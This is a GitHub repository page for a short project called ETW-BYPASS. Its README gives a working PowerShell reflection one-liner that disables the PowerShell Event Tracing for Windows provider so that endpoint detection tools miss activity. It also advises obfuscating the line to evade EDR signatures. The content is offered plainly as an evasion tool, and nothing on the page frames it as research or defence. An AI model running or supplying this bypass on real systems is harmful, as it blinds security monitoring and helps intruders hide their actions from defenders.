8000
Skip to content

34zY/ETW-BYPASS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

ETW-BYPASS

This script perform ETW-Bypass to avoid EDR detection

[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
  • This is caught by most of EDR's with it's signature so perform some obfuscation to get around it

About

etw bypass script

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

0